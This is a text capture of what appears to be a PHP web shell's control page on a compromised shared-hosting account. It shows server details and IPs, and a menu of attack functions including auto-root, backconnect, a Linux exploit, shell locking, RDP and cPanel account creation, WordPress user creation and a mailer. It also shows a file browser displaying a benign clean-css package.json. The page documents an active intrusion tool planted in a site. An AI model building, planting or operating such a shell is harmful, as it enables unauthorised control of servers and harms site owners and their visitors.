Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
clean-css /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
History.md
80.86
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
README.md
39.6
KB
-rw-r--r--
index.js
41
B
-rw-r--r--
package.json
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "clean-css", "version": "5.2.2", "author": "Jakub Pawlowicz <contact@jakubpawlowicz.com>", "description": "A well-tested CSS minifier", "license": "MIT", "keywords": [ "css", "minifier" ], "homepage": "https://github.com/clean-css/clean-css", "repository": { "type": "git", "url": "https://github.com/clean-css/clean-css.git" }, "bugs": { "url": "https://github.com/clean-css/clean-css/issues" }, "main": "index.js", "files": [ "lib", "History.md", "index.js", "LICENSE" ], "scripts": { "browserify": "browserify --standalone CleanCSS index.js | uglifyjs --compress --mangle -o cleancss-browser.js", "bench": "node ./test/bench.js", "check": "jshint .", "prepublish": "npm run check", "test": "vows" }, "dependencies": { "source-map": "~0.6.0" }, "devDependencies": { "browserify": "^17.0.0", "http-proxy": "1.x", "jshint": "2.x", "nock": "^13.0.0", "server-destroy": "1.x", "uglify-js": ">=2.6.1", "vows": "0.8.x" }, "engines": { "node": ">= 10.0" } }
Close